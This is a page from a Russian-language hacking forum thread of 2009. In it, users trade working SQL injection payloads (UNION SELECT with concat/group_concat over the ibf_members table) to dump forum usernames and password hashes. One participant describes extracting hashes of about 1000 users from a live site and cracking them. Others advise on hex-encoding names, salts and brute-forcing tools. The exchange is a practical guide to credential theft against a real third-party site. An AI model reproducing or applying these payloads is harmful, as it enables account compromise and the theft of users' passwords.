Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Никак нах...
     
    1 person likes this.
  2. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Nikmurder::8593e40f18a60bf0b3379d41a47f4481 Скажите это MD5 hashes?
     
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 massovka да
     
  4. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    с чем связано то что
    passwordsPro не находит пароль который должен был бы бесспорно найти ?

    даю ему хеш пароля от mysql версии 5 стоящей у меня на комп.е , выбираю тип хеша mysql5 , и ничего . не находит . даже маску легкую задаю , и все равно не находит
     
  5. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Вероятно ты что то неправильно делаешь, во первых скажи как брутишь, т.е. каким способом???( словарь, полный перебор, атака по маске, атака по райнбоу-таблицам и т.п.) отсюда и будем отталкиваться...
     
  6. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    и по полному перебору пробовал,
    и по маске
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    1,group_concat(concat_ws(0x3a,name,member_login_key)+separator+0x0a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+ibf_members--+

    Далее, я тебе просто показал таблицу, не факт , что там не солёные хеши, просмотри ВСЕ столбцы, возможно в базе есть соль, возможно там двойной MD5, или просто генерённые пароли, тогда вероятность брута приближается к нулю.(это по поводу перебора)

    И ещё раз настоятельно рекоммендую почитать статьи по скулям, все станет гораздо прощё.


    PS

    Я же вроде просил, если не уверен не отвечать.
    Да ещё так категорично.
     
    2 people like this.
  8. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    jokester group_concat это само собой, причем тут вся таблица? Он просил вывести именно таблицу (насколько я понял, претензии по этому поводу не ко мне, попроси лучьше новичков вопросы поясней как то задавать что ли, почему то я более чем уверен, что он имелл ввиду именно, чтобы вывод был всей таблицы, гг так ещё и с рамками ёпт)!!!
     
    #6408 DrAssault, 7 Apr 2009
    Last edited: 7 Apr 2009
  9. FarIZ

    FarIZ New Member

    Joined:
    16 Mar 2009
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    насчет моей проблемы
    ...дайте на худой конец хоть линки к соотв. темам форума
     
  10. serfertty

    serfertty Guest

    Reputations:
    0
    Как раз вопрос был ясен=\. Имхо jokester прав Только у group_concat() есть минус в том, что выводить можно не больше 1024 знаков.
    П.С. Сорри за оффтоп.
     
    1 person likes this.
  11. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ты просто не в тот раздел обратился. Попробуй сюда:
    https://forum.antichat.ru/forum76.html
    карта раздела
    https://forum.antichat.ru/thread76958.html
    форум самой программы
    http://forum.insidepro.com/viewforum.php?f=8

    У меня лично отлично всё находит и перебирает, если всё делать правильно
     
    2 people like this.
  12. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Вопрос


    А кто знает как можно вывести хэш одного usera и базы очень нужно! Ник юзера знаю

    concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+0,2/*
     
  13. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    massovka
    Code:
    concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+where+name=NICK/*
    Где NICK - это ник того кого ты хочешь вывести... вроде так если не ошибаюсь!
    p.s. пробелов там нет =)
     
    #6413 Kraneg, 7 Apr 2009
    Last edited: 7 Apr 2009
  14. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Code:
    where+name='NICK'
    так лучше. если с ошибкой то NICK в хексе и без кавычек.
     
  15. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Вот что пише

    Unknown column 'bybyby' in 'where clause
     
  16. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1

    /index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_key),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+ibf_members+where+name=0x627962796279/*


    Ответ пусто
     
  17. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1

    Получилось увидел! Но возник 2 вопрос того кого я ищу нет! Но я точно знаю что такой юзер есть я сегодня его сам зарегистрировал! Может он вдругой базе? или как?
     
  18. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    massovka, попобуй поищи по id, может у тебягде ошибка проверяй внимательней!
     
  19. massovka

    massovka Member

    Joined:
    5 Apr 2009
    Messages:
    71
    Likes Received:
    7
    Reputations:
    -1
    Masterok 0x4d61737465726f6b
    SpideR 0x537069646552

    В базе порядка 1000 юзеров я вот взял те которые выше перевел как вы сказали! нахожу их без проблем

    Сегодня днем зарегил bybyby(захожу по дним на сайте он есть 100%) ищу его как мне сказали выше ПУСТО

    Проблема втом что у меня есть хэш всех юзеров я вчера до 5 утра начал перебирать http://hash.insidepro.com/index.php вот в этой базе! из 300 человек ни одного стндартного паролья Я В ШОКЕ!

    Вот и зарегил сегодня bybyby посмотреть как он шыфруется!

    и вот трабл его не могу в базе найти! Может там еще база с юзерами есть?
     
  20. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Уверен, что там мд5?
    Если он, то уверен, что там не двойное шифрование?
     
Thread Status:
Not open for further replies.